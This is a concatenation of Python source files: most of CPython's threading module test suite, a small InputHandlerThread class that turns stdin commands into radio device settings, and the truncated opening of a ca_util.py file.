self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
@test.support.cpython_only
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
@test.support.cpython_only
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
newgil = hasattr(sys, 'getswitchinterval')
if newgil:
geti, seti = sys.getswitchinterval, sys.setswitchinterval
else:
geti, seti = sys.getcheckinterval, sys.setcheckinterval
old_interval = geti()
try:
for i in range(1, 100):
seti(i * 0.0002 if newgil else i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
seti(old_interval)
@test.support.cpython_only
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
with self.assertWarnsRegex(PendingDeprecationWarning, 'use is_alive()'):
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
newgil = hasattr(sys, 'getswitchinterval')
if newgil:
geti, seti = sys.getswitchinterval, sys.setswitchinterval
else:
geti, seti = sys.getcheckinterval, sys.setcheckinterval
old_interval = geti()
self.addCleanup(seti, old_interval)
# Make the bug more likely to manifest.
seti(1e-6 if newgil else 1)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@test.support.cpython_only
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
@cpython_only
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in the main thread,
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
InputHandlerThread.py
|
from Queue import Queue, Empty
from threading import Thread
import sys
import time
class InputHandlerThread(Thread):
def __init__(self, device):
Thread.__init__(self)
self.queue = Queue()
self.device = device
self.daemon = True
t = Thread(target=self.enqueue_input, args=(sys.stdin, self.queue,))
t.daemon = True # thread dies with the program
t.start()
def enqueue_input(self, inp, queue):
for line in iter(inp.readline, b''):
queue.put(line)
inp.close()
def read_input(self):
result = []
while True:
try:
result.append(self.queue.get_nowait())
except Empty:
break
result = b"".join(result)
return result.decode("utf-8")
def run(self):
while True:
i = self.read_input()
if len(i) > 0:
if i.startswith("SR:"):
try:
v = float(i.replace("SR:", "").split(" ")[-1])
except ValueError:
v = 1
self.device.set_samp_rate(v)
elif i.startswith("G:"):
try:
v = int(i.replace("G:", "").split(" ")[-1])
except ValueError:
v = 1
self.device.set_gain(v)
elif i.startswith("BW:"):
try:
v = float(i.replace("BW:", "").split(" ")[-1])
except ValueError:
v = 1
self.device.set_bw(v)
elif i.startswith("F:"):
try:
v = float(i.replace("F:", "").split(" ")[-1])
except ValueError:
v = 1
self.device.set_freq(v)
time.sleep(0.1)
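# --- Hedged usage sketch (not part of the original module) ---
# run() above reads newline-terminated commands from stdin such as
# "F: 433920000", "G: 20", "BW: 250000" or "SR: 2000000" and forwards the
# parsed value to the device. DummyDevice is a hypothetical stand-in that
# only provides the four setter methods used in run().
if __name__ == "__main__":
    class DummyDevice(object):
        def set_samp_rate(self, v):
            print("sample rate set to %s" % v)

        def set_gain(self, v):
            print("gain set to %s" % v)

        def set_bw(self, v):
            print("bandwidth set to %s" % v)

        def set_freq(self, v):
            print("frequency set to %s" % v)

    handler = InputHandlerThread(DummyDevice())
    handler.start()
    # Type e.g. "F: 433920000" and press Enter; interrupt with Ctrl-C.
    while handler.is_alive():
        time.sleep(1)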
|
ca_util.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
